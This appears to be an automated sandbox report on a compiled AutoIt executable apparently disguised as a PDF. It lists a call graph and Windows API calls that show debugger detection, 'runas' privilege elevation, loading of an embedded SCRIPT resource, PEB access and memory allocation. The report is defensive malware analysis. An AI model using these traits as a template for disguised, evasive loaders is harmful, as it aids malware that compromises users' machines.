b5d95d 107 API calls _free 100574->100617 100576->100549 100580->100572 100618 ae8ea0 59 API calls Mailbox 100580->100618 100619 ae9e9c 60 API calls Mailbox 100580->100619 100621 b5d95d 107 API calls _free 100580->100621 100582 ae7faf 59 API calls 100581->100582 100583 b5dad4 CharLowerBuffW 100582->100583 100622 b3f658 100583->100622 100587 ae77c7 59 API calls 100588 b5db0d 100587->100588 100589 ae79ab 59 API calls 100588->100589 100590 b5db24 100589->100590 100591 ae7e8c 59 API calls 100590->100591 100592 b5db30 Mailbox 100591->100592 100593 b5db6c Mailbox 100592->100593 100629 b5d2f3 61 API calls 2 library calls 100592->100629 100593->100560 100595 b5cc9d 100594->100595 100599 b5ccf2 100594->100599 100596 b00ff6 Mailbox 59 API calls 100595->100596 100598 b5ccbf 100596->100598 100597 b00ff6 Mailbox 59 API calls 100597->100598 100598->100597 100598->100599 100600 b5dd64 100599->100600 100601 b5df8d Mailbox 100600->100601 100608 b5dd87 _strcat _wcscpy __wsetenvp 100600->100608 100601->100559 100602 ae9c9c 59 API calls 100602->100608 100603 ae9d46 59 API calls 100603->100608 100604 ae9cf8 59 API calls 100604->100608 100605 ae9997 84 API calls 100605->100608 100606 b0594c 58 API calls __malloc_crt 100606->100608 100608->100601 100608->100602 100608->100603 100608->100604 100608->100605 100608->100606 100632 b45b29 61 API calls 2 library calls 100608->100632 100611 b00e5d 100609->100611 100610 b00ef5 VirtualAlloc 100612 b00ec3 100610->100612 100611->100610 100611->100612 100612->100563 100612->100564 100613->100560 100614->100560 100615->100567 100616->100574 100617->100580 100618->100580 100619->100580 100620->100551 100621->100580 100623 b3f683 __wsetenvp 100622->100623 100624 b3f6c2 100623->100624 100627 b3f6b8 100623->100627 100628 b3f769 100623->100628 100624->100587 100624->100592 100627->100624 100630 ae7a24 61 API calls 100627->100630 100628->100624 100631 ae7a24 61 API calls 100628->100631 100629->100593 100630->100627 100631->100628 100632->100608 100634 ae77c7 59 API calls 100633->100634 100635 b3f905 100634->100635 100636 ae7b76 59 API calls 100635->100636 100637 b3f919 100636->100637 100638 b3f658 61 API calls 100637->100638 100644 b3f93b 100637->100644 100639 b3f935 100638->100639 100641 ae79ab 59 API calls 100639->100641 100639->100644 100640 b3f658 61 API calls 100640->100644 100641->100644 100642 b3f9b5 100645 ae79ab 59 API calls 100642->100645 100643 ae79ab 59 API calls 100643->100644 100644->100640 100644->100642 100644->100643 100648 ae7c8e 59 API calls 100644->100648 100646 b3f9ce 100645->100646 100647 ae7c8e 59 API calls 100646->100647 100649 b3f9da 100647->100649 100648->100644 100651 b3f9e9 Mailbox 100649->100651 100653 ae80d7 59 API calls 2 library calls 100649->100653 100651->100441 100652->100443 100653->100651 100654->100490 100655->100453 100656->100488 100657->100488 100659 ae56dd 100658->100659 100660 ae5702 100658->100660 100659->100660 100664 ae56ec 100659->100664 100661 ae7eec 59 API calls 100660->100661 100665 b4349a 100661->100665 100662 b434c9 100662->100521 100666 ae5c18 59 API calls 100664->100666 100665->100662 100680 b43436 ReadFile SetFilePointerEx 100665->100680 100681 ae7a84 59 API calls 2 library calls 100665->100681 100667 b435ba 100666->100667 100669 ae5632 61 API calls 100667->100669 100670 b435c8 100669->100670 100672 b435d8 Mailbox 100670->100672 100682 ae793a 61 API calls Mailbox 100670->100682 100672->100521 100673->100499 100674->100526 100675->100527 100676->100498 100677->100498 100678->100523 100679->100525 100680->100665 100681->100665 100682->100672 100684 b36641 100683->100684 100685 b3665e 100683->100685 100684->100685 100687 b36621 59 API calls Mailbox 100684->100687 100685->100538 100687->100684 100688 1c523b0 100702 1c50000 100688->100702 100690 1c5243a 100705 1c522a0 100690->100705 100708 1c53460 GetPEB 100702->100708 100704 1c5068b 100704->100690 100706 1c522a9 Sleep 100705->100706 100707 1c522b7 100706->100707 100709 1c5348a 100708->100709 100709->100704 100710 aee608 100713 aed260 100710->100713 100712 aee616 100714 aed27d 100713->100714 100731 aed4dd 100713->100731 100715 b22b0a 100714->100715 100716 b22abb 100714->100716 100732 aed2a4 100714->100732 100757 b5a6fb 331 API calls __cinit 100715->100757 100719 b22abe 100716->100719 100726 b22ad9 100716->100726 100720 b22aca 100719->100720 100719->100732 100755 b5ad0f 331 API calls 100720->100755 100722 b02f80 __cinit 67 API calls 100722->100732 100724 b22cdf 100724->100724 100725 aed6ab 100725->100712 100726->100731 100756 b5b1b7 331 API calls 3 library calls 100726->100756 100727 aed594 100749 ae8bb2 68 API calls 100727->100749 100731->100725 100762 b4a0b5 89 API calls 4 library calls 100731->100762 100732->100722 100732->100725 100732->100727 100732->100731 100734 b22c26 100732->100734 100738 ae8620 69 API calls 100732->100738 100744 aea000 331 API calls 100732->100744 100745 ae81a7 59 API calls 100732->100745 100747 ae88a0 68 API calls __cinit 100732->100747 100748 ae86a2 68 API calls 100732->100748 100750 ae859a 68 API calls 100732->100750 100751 aed0dc 331 API calls 100732->100751 100752 ae9f3a 59 API calls Mailbox 100732->100752 100753 aed060 89 API calls 100732->100753 100754 aecedd 331 API calls 100732->100754 100758 ae8bb2 68 API calls 100732->100758 100759 ae9e9c 60 API calls Mailbox 100732->100759 100760 b36d03 60 API calls 100732->100760 100733 aed5a3 100733->100712 100761 b5aa66 89 API calls 100734->100761 100738->100732 100744->100732 100745->100732 100747->100732 100748->100732 100749->100733 100750->100732 100751->100732 100752->100732 100753->100732 100754->100732 100755->100725 100756->100731 100757->100732 100758->100732 100759->100732 100760->100732 100761->100731 100762->100724 100763 b1ff06 100764 b1ff10 100763->100764 100804 aeac90 Mailbox _memmove 100763->100804 100864 ae8e34 59 API calls Mailbox 100764->100864 100766 b00ff6 59 API calls Mailbox 100766->100804 100772 aeb5d5 100775 ae81a7 59 API calls 100772->100775 100773 b00ff6 59 API calls Mailbox 100789 aea097 Mailbox 100773->100789 100774 ae81a7 59 API calls 100774->100789 100784 aea1b7 100775->100784 100776 b2047f 100868 b4a0b5 89 API calls 4 library calls 100776->100868 100777 aeb5da 100873 b4a0b5 89 API calls 4 library calls 100777->100873 100780 ae7f41 59 API calls 100780->100804 100781 ae77c7 59 API calls 100781->100789 100783 b2048e 100786 b02f80 67 API calls __cinit 100786->100789 100787 b37405 59 API calls 100787->100789 100788 b366f4 Mailbox 59 API calls 100788->100784 100789->100772 100789->100773 100789->100774 100789->100776 100789->100777 100789->100781 100789->100784 100789->100786 100789->100787 100790 b20e00 100789->100790 100793 aea6ba 100789->100793 100859 aeca20 331 API calls 2 library calls 100789->100859 100860 aeba60 60 API calls Mailbox 100789->100860 100872 b4a0b5 89 API calls 4 library calls 100790->100872 100792 b5bf80 331 API calls 100792->100804 100871 b4a0b5 89 API calls 4 library calls 100793->100871 100794 b366f4 Mailbox 59 API calls 100794->100804 100795 aeb416 100863 aef803 331 API calls 100795->100863 100797 aea000 331 API calls 100797->100804 100798 b20c94 100799 ae9df0 Mailbox 59 API calls 100798->100799 100802 b20c86 100799->100802 100800 b20ca2 100870 b4a0b5 89 API calls 4 library calls 100800->100870 100802->100784 100802->100788 100803 aeb37c 100861 ae9e9c 60 API calls Mailbox 100803->100861 100804->100766 100804->100780 100804->100784 100804->100789 100804->100792 100804->100794 100804->100795 100804->100797 100804->100798 100804->100800 100804->100803 100809 aeb685 100804->100809 100812 aeade2 Mailbox 100804->100812 100821 b5c5f4 100804->100821 100853 b47be0 100804->100853 100865 b37405 59 API calls 100804->100865 100866 b5c4a7 85 API calls 2 library calls 100804->100866 100806 aeb38d 100862 ae9e9c 60 API calls Mailbox 100806->100862 100869 b4a0b5 89 API calls 4 library calls 100809->100869 100811 ae9df0 Mailbox 59 API calls 100811->100812 100812->100784 100812->100802 100812->100809 100812->100811 100813 b200e0 VariantClear 100812->100813 100814 b4d2e5 101 API calls 100812->100814 100815 b4d2e6 101 API calls 100812->100815 100816 b5e237 130 API calls 100812->100816 100817 b5474d 331 API calls 100812->100817 100818 b6251d 62 API calls 100812->100818 100819 af2123 95 API calls 100812->100819 100820 b5e24b 130 API calls 100812->100820 100867 b37405 59 API calls 100812->100867 100813->100812 100814->100812 100815->100812 100816->100812 100817->100812 100818->100812 100819->100812 100820->100812 100822 ae77c7 59 API calls 100821->100822 100823 b5c608 100822->100823 100824 ae77c7 59 API calls 100823->100824 100825 b5c610 100824->100825 100826 ae77c7 59 API calls 100825->100826 100827 b5c618 100826->100827 100828 ae9997 84 API calls 100827->100828 100840 b5c626 100828->100840 100829 ae7d2c 59 API calls 100829->100840 100830 b5c80f 100831 b5c83c Mailbox 100830->100831 100876 ae9b9c 59 API calls Mailbox 100830->100876 100831->100804 100833 b5c7f6 100835 ae7e0b 59 API calls 100833->100835 100834 b5c811 100839 ae7e0b 59 API calls 100834->100839 100838 b5c803 100835->100838 100836 ae7a84 59 API calls 100836->100840 100837 ae81a7 59 API calls 100837->100840 100842 ae7c8e 59 API calls 100838->100842 100843 b5c820 100839->100843 100840->100829 100840->100830 100840->100831 100840->100833 100840->100834 100840->100836 100840->100837 100841 ae7faf 59 API calls 100840->100841 100845 ae7faf 59 API calls 100840->100845 100850 ae9997 84 API calls 100840->100850 100851 ae7e0b 59 API calls 100840->100851 100852 ae7c8e 59 API calls 100840->100852 100846 b5c6bd CharUpperBuffW 100841->100846 100842->100830 100844 ae7c8e 59 API calls 100843->100844 100844->100830 100847 b5c77d CharUpperBuffW 100845->100847 100874 ae859a 68 API calls 100846->100874 100875 aec707 69 API calls 2 library calls 100847->100875 100850->100840 100851->100840 100852->100840 100854 b47bec 100853->100854 100855 b00ff6 Mailbox 59 API calls 100854->100855 100856 b47bfa 100855->100856 100857 b47c08 100856->100857 100858 ae77c7 59 API calls 100856->100858 100857->100804 100858->100857 100859->100789 100860->100789 100861->100806 100862->100795 100863->100809 100864->100804 100865->100804 100866->100804 100867->100812 100868->100783 100869->100802 100870->100802 100871->100784 100872->100777 100873->100784 100874->100840 100875->100840 100876->100831 100877 ae1016 100882 ae4ad2 100877->100882 100880 b02f80 __cinit 67 API calls 100881 ae1025 100880->100881 100883 b00ff6 Mailbox 59 API calls 100882->100883 100884 ae4ada 100883->100884 100885 ae101b 100884->100885 100889 ae4a94 100884->100889 100885->100880 100890 ae4a9d 100889->100890 100891 ae4aaf 100889->100891 100892 b02f80 __cinit 67 API calls 100890->100892 100893 ae4afe 100891->100893 100892->100891 100894 ae77c7 59 API calls 100893->100894 100895 ae4b16 GetVersionExW 100894->100895 100896 ae7d2c 59 API calls 100895->100896 100897 ae4b59 100896->100897 100898 ae7e8c 59 API calls 100897->100898 100909 ae4b86 100897->100909 100899 ae4b7a 100898->100899 100900 ae7886 59 API calls 100899->100900 100900->100909 100901 ae4bf1 GetCurrentProcess IsWow64Process 100903 ae4c0a 100901->100903 100902 b1dc8d 100904 ae4c89 GetSystemInfo 100903->100904 100905 ae4c20 100903->100905 100906 ae4c56 100904->100906 100917 ae4c95 100905->100917 100906->100885 100909->100901 100909->100902 100910 ae4c7d GetSystemInfo 100913 ae4c47 100910->100913 100911 ae4c32 100912 ae4c95 2 API calls 100911->100912 100914 ae4c3a GetNativeSystemInfo 100912->100914 100913->100906 100915 ae4c4d FreeLibrary 100913->100915 100914->100913 100915->100906 100918 ae4c2e 100917->100918 100919 ae4c9e LoadLibraryA 100917->100919 100918->100910 100918->100911 100919->100918 100920 ae4caf GetProcAddress 100919->100920 100920->100918 100921 ae1066 100926 aef8cf 100921->100926 100923 ae106c 100924 b02f80 __cinit 67 API calls 100923->100924 100925 ae1076 100924->100925 100927 aef8f0 100926->100927 100959 b00143 100927->100959 100931 aef937 100932 ae77c7 59 API calls 100931->100932 100933 aef941 100932->100933 100934 ae77c7 59 API calls 100933->100934 100935 aef94b 100934->100935 100936 ae77c7 59 API calls 100935->100936 100937 aef955 100936->100937 100938 ae77c7 59 API calls 100937->100938 100939 aef993 100938->100939 100940 ae77c7 59 API calls 100939->100940 100941 aefa5e 100940->100941 100969 af60e7 100941->100969 100945 aefa90 100946 ae77c7 59 API calls 100945->100946 100947 aefa9a 100946->100947 100997 afffde 100947->100997 100949 aefae1 100950 aefaf1 GetStdHandle 100949->100950 100951 aefb3d 100950->100951 100952 b249d5 100950->100952 100953 aefb45 OleInitialize 100951->100953 100952->100951 100954 b249de 100952->100954 100953->100923 101004 b46dda 64 API calls Mailbox 100954->101004 100956 b249e5 101005 b474a9 CreateThread 100956->101005 100958 b249f1 CloseHandle 100958->100953 101006 b0021c 100959->101006 100962 b0021c 59 API calls 100963 b00185 100962->100963 100964 ae77c7 59 API calls 100963->100964 100965 b00191 100964->100965 100966 ae7d2c 59 API calls 100965->100966 100967 aef8f6 100966->100967 100968 b003a2 6 API calls 100967->100968 100968->100931 100970 ae77c7 59 API calls 100969->100970 100971 af60f7 100970->100971 100972 ae77c7 59 API calls 100971->100972 100973 af60ff 100972->100973 101013 af5bfd 100973->101013 100976 af5bfd 59 API calls 100977 af610f 100976->100977 100978 ae77c7 59 API calls 100977->100978 100979 af611a 100978->100979 100980 b00ff6 Mailbox 59 API calls 100979->100980 100981 aefa68 100980->100981 100982 af6259 100981->100982 100983 af6267 100982->100983 100984 ae77c7 59 API calls 100983->100984 100985 af6272 100984->100985 100986 ae77c7 59 API calls 100985->100986 100987 af627d 100986->100987 100988 ae77c7 59 API calls 100987->100988 100989 af6288 100988->100989 100990 ae77c7 59 API calls 100989->100990 100991 af6293 100990->100991 100992 af5bfd 59 API calls 100991->100992 100993 af629e 100992->100993 100994 b00ff6 Mailbox 59 API calls 100993->100994 100995 af62a5 RegisterWindowMessageW 100994->100995 100995->100945 100998 b35cc3 100997->100998 100999 afffee 100997->100999 101016 b49d71 60 API calls 100998->101016 101000 b00ff6 Mailbox 59 API calls 100999->101000 101002 affff6 101000->101002 101002->100949 101003 b35cce 101004->100956 101005->100958 101017 b4748f 65 API calls 101005->101017 101007 ae77c7 59 API calls 101006->101007 101008 b00227 101007->101008 101009 ae77c7 59 API calls 101008->101009 101010 b0022f 101009->101010 101011 ae77c7 59 API calls 101010->101011 101012 b0017b 101011->101012 101012->100962 101014 ae77c7 59 API calls 101013->101014 101015 af5c05 101014->101015 101015->100976 101016->101003 101018 ae1055 101023 ae2649 101018->101023 101021 b02f80 __cinit 67 API calls 101022 ae1064 101021->101022 101024 ae77c7 59 API calls 101023->101024 101025 ae26b7 101024->101025 101030 ae3582 101025->101030 101028 ae2754 101029 ae105a 101028->101029 101033 ae3416 59 API calls 2 library calls 101028->101033 101029->101021 101034 ae35b0 101030->101034 101033->101028 101035 ae35a1 101034->101035 101036 ae35bd 101034->101036 101035->101028 101036->101035 101037 ae35c4 RegOpenKeyExW 101036->101037 101037->101035 101038 ae35de RegQueryValueExW 101037->101038 101039 ae35ff 101038->101039 101040 ae3614 RegCloseKey 101038->101040 101039->101040 101040->101035 101041 ae3633 101042 ae366a 101041->101042 101043 ae3688 101042->101043 101044 ae36e7 101042->101044 101081 ae36e5 101042->101081 101048 ae375d PostQuitMessage 101043->101048 101049 ae3695 101043->101049 101046 ae36ed 101044->101046 101047 b1d31c 101044->101047 101045 ae36ca DefWindowProcW 101083 ae36d8 101045->101083 101050 ae3715 SetTimer RegisterWindowMessageW 101046->101050 101051 ae36f2 101046->101051 101091 af11d0 10 API calls Mailbox 101047->101091 101048->101083 101052 b1d38f 101049->101052 101053 ae36a0 101049->101053 101057 ae373e CreatePopupMenu 101050->101057 101050->101083 101055 ae36f9 KillTimer 101051->101055 101056 b1d2bf 101051->101056 101095 b42a16 71 API calls _memset 101052->101095 101058 ae36a8 101053->101058 101059 ae3767 101053->101059 101086 ae44cb Shell_NotifyIconW _memset 101055->101086 101063 b1d2c4 101056->101063 101064 b1d2f8 MoveWindow 101056->101064 101057->101083 101066 b1d374 101058->101066 101067 ae36b3 101058->101067 101089 ae4531 64 API calls _memset 101059->101089 101061 b1d343 101092 af11f3 331 API calls Mailbox 101061->101092 101072 b1d2e7 SetFocus 101063->101072 101073 b1d2c8 101063->101073 101064->101083 101066->101045 101094 b3817e 59 API calls Mailbox 101066->101094 101070 ae36be 101067->101070 101075 ae374b 101067->101075 101068 b1d3a1 101068->101045 101068->101083 101070->101045 101093 ae44cb Shell_NotifyIconW _memset 101070->101093 101071 ae375b 101071->101083 101072->101083 101073->101070 101076 b1d2d1 101073->101076 101074 ae370c 101087 ae3114 DeleteObject DestroyWindow Mailbox 101074->101087 101088 ae45df 81 API calls _memset 101075->101088 101090 af11d0 10 API calls Mailbox 101076->101090 101081->101045 101084 b1d368 101085 ae43db 68 API calls 101084->101085 101085->101081 101086->101074 101087->101083 101088->101071 101089->101071 101090->101083 101091->101061 101092->101070 101093->101084 101094->101081 101095->101068

                                                                          Executed Functions

                                                                          Function 00AE3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AE3B7A
                                                                          • IsDebuggerPresent.KERNEL32 ref: 00AE3B8C
                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00BA62F8,00BA62E0,?,?), ref: 00AE3BFD
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                            • Part of subcall function 00AF0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AE3C26,00BA62F8,?,?,?), ref: 00AF0ACE
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE3C81
                                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00B993F0,00000010), ref: 00B1D4BC
                                                                          • SetCurrentDirectoryW.KERNEL32(?,00BA62F8,?,?,?), ref: 00B1D4F4
                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B95D40,00BA62F8,?,?,?), ref: 00B1D57A
                                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00B1D581
                                                                            • Part of subcall function 00AE3A58: GetSysColorBrush.USER32(0000000F), ref: 00AE3A62
                                                                            • Part of subcall function 00AE3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00AE3A71
                                                                            • Part of subcall function 00AE3A58: LoadIconW.USER32(00000063), ref: 00AE3A88
                                                                            • Part of subcall function 00AE3A58: LoadIconW.USER32(000000A4), ref: 00AE3A9A
                                                                            • Part of subcall function 00AE3A58: LoadIconW.USER32(000000A2), ref: 00AE3AAC
                                                                            • Part of subcall function 00AE3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AE3AD2
                                                                            • Part of subcall function 00AE3A58: RegisterClassExW.USER32(?), ref: 00AE3B28
                                                                            • Part of subcall function 00AE39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AE3A15
                                                                            • Part of subcall function 00AE39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AE3A36
                                                                            • Part of subcall function 00AE39E7: ShowWindow.USER32(00000000,?,?), ref: 00AE3A4A
                                                                            • Part of subcall function 00AE39E7: ShowWindow.USER32(00000000,?,?), ref: 00AE3A53
                                                                            • Part of subcall function 00AE43DB: _memset.LIBCMT ref: 00AE4401
                                                                            • Part of subcall function 00AE43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AE44A6
                                                                          Strings
                                                                          • This is a third-party compiled AutoIt script., xrefs: 00B1D4B4
                                                                          • runas, xrefs: 00B1D575
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                          • String ID: This is a third-party compiled AutoIt script.$runas
                                                                          • API String ID: 529118366-3287110873
                                                                          • Opcode ID: ea2ad0385c8168e866aa82af180058f2d1bae37c512b3b6a7a7754a4b42edfdf
                                                                          • Instruction ID: fe877d00a576eb7d778dd24520ed0ba6763f577f24761c19c94a3c84fc78befa
                                                                          • Opcode Fuzzy Hash: ea2ad0385c8168e866aa82af180058f2d1bae37c512b3b6a7a7754a4b42edfdf
                                                                          • Instruction Fuzzy Hash: 62510A72908389AECF11EBB5DD1AEFD7BB8AF46300F1440B5F411631A1DE749A45CB21
                                                                          Function 00AE4AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 996 ae4afe-ae4b5e call ae77c7 GetVersionExW call ae7d2c 1001 ae4c69-ae4c6b 996->1001 1002 ae4b64 996->1002 1003 b1db90-b1db9c 1001->1003 1004 ae4b67-ae4b6c 1002->1004 1005 b1db9d-b1dba1 1003->1005 1006 ae4b72 1004->1006 1007 ae4c70-ae4c71 1004->1007 1009 b1dba3 1005->1009 1010 b1dba4-b1dbb0 1005->1010 1008 ae4b73-ae4baa call ae7e8c call ae7886 1006->1008 1007->1008 1018 b1dc8d-b1dc90 1008->1018 1019 ae4bb0-ae4bb1 1008->1019 1009->1010 1010->1005 1012 b1dbb2-b1dbb7 1010->1012 1012->1004 1014 b1dbbd-b1dbc4 1012->1014 1014->1003 1016 b1dbc6 1014->1016 1020 b1dbcb-b1dbce 1016->1020 1021 b1dc92 1018->1021 1022 b1dca9-b1dcad 1018->1022 1019->1020 1023 ae4bb7-ae4bc2 1019->1023 1024 b1dbd4-b1dbf2 1020->1024 1025 ae4bf1-ae4c08 GetCurrentProcess IsWow64Process 1020->1025 1026 b1dc95 1021->1026 1030 b1dc98-b1dca1 1022->1030 1031 b1dcaf-b1dcb8 1022->1031 1027 b1dc13-b1dc19 1023->1027 1028 ae4bc8-ae4bca 1023->1028 1024->1025 1029 b1dbf8-b1dbfe 1024->1029 1032 ae4c0d-ae4c1e 1025->1032 1033 ae4c0a 1025->1033 1026->1030 1038 b1dc23-b1dc29 1027->1038 1039 b1dc1b-b1dc1e 1027->1039 1034 ae4bd0-ae4bd3 1028->1034 1035 b1dc2e-b1dc3a 1028->1035 1036 b1dc00-b1dc03 1029->1036 1037 b1dc08-b1dc0e 1029->1037 1030->1022 1031->1026 1040 b1dcba-b1dcbd 1031->1040 1041 ae4c89-ae4c93 GetSystemInfo 1032->1041 1042 ae4c20-ae4c30 call ae4c95 1032->1042 1033->1032 1043 ae4bd9-ae4be8 1034->1043 1044 b1dc5a-b1dc5d 1034->1044 1046 b1dc44-b1dc4a 1035->1046 1047 b1dc3c-b1dc3f 1035->1047 1036->1025 1037->1025 1038->1025 1039->1025 1040->1030 1045 ae4c56-ae4c66 1041->1045 1053 ae4c7d-ae4c87 GetSystemInfo 1042->1053 1054 ae4c32-ae4c3f call ae4c95 1042->1054 1051 ae4bee 1043->1051 1052 b1dc4f-b1dc55 1043->1052 1044->1025 1050 b1dc63-b1dc78 1044->1050 1046->1025 1047->1025 1055 b1dc82-b1dc88 1050->1055 1056 b1dc7a-b1dc7d 1050->1056 1051->1025 1052->1025 1058 ae4c47-ae4c4b 1053->1058 1061 ae4c76-ae4c7b 1054->1061 1062 ae4c41-ae4c45 GetNativeSystemInfo 1054->1062 1055->1025 1056->1025 1058->1045 1060 ae4c4d-ae4c50 FreeLibrary 1058->1060 1060->1045 1061->1062 1062->1058
                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(?), ref: 00AE4B2B
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          • GetCurrentProcess.KERNEL32(?,00B6FAEC,00000000,00000000,?), ref: 00AE4BF8
                                                                          • IsWow64Process.KERNEL32(00000000), ref: 00AE4BFF
                                                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00AE4C45
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00AE4C50
                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00AE4C81
                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00AE4C8D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                          • String ID:
                                                                          • API String ID: 1986165174-0
                                                                          • Opcode ID: 2c644495badf0b6f69a1e29bc716d345d43cc11f38f3fb946d89eb621b1abf40
                                                                          • Instruction ID: b306ceb8a456f2545113f96d30abebfb87744dd9b294227a45e6c6009b05bc68
                                                                          • Opcode Fuzzy Hash: 2c644495badf0b6f69a1e29bc716d345d43cc11f38f3fb946d89eb621b1abf40
                                                                          • Instruction Fuzzy Hash: A091E43154A7C0DEC731CB7995512ABBFF8AF6A300B584D9DE0CB93A41D224F948C759
                                                                          Function 00AE4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1063 ae4fe9-ae5001 CreateStreamOnHGlobal 1064 ae5003-ae501a FindResourceExW 1063->1064 1065 ae5021-ae5026 1063->1065 1066 b1dd5c-b1dd6b LoadResource 1064->1066 1067 ae5020 1064->1067 1066->1067 1068 b1dd71-b1dd7f SizeofResource 1066->1068 1067->1065 1068->1067 1069 b1dd85-b1dd90 LockResource 1068->1069 1069->1067 1070 b1dd96-b1ddb4 1069->1070 1070->1067
                                                                          APIs
                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00AE4EEE,?,?,00000000,00000000), ref: 00AE4FF9
                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AE4EEE,?,?,00000000,00000000), ref: 00AE5010
                                                                          • LoadResource.KERNEL32(?,00000000,?,?,00AE4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AE4F8F), ref: 00B1DD60
                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00AE4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AE4F8F), ref: 00B1DD75
                                                                          • LockResource.KERNEL32(00AE4EEE,?,?,00AE4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AE4F8F,00000000), ref: 00B1DD88
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                          • String ID: SCRIPT
                                                                          • API String ID: 3051347437-3967369404
                                                                          • Opcode ID: 4d3c3d6e8abcd4fc1cc4606575e152cafafc8e942378317c62246e35f926808c
                                                                          • Instruction ID: 1efaeaaa9df4c95c93e5424176e2a3b6a69304650ede566c6bdc95acc81d3eb9
                                                                          • Opcode Fuzzy Hash: 4d3c3d6e8abcd4fc1cc4606575e152cafafc8e942378317c62246e35f926808c
                                                                          • Instruction Fuzzy Hash: AF112A75640741AFD7218B6AEC58F677BB9EBC9B55F204168F406D72A0DBA1E8008A60
                                                                          Function 00B44696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,00B1E7C1), ref: 00B446A6
                                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00B446B7
                                                                          • FindClose.KERNEL32(00000000), ref: 00B446C7
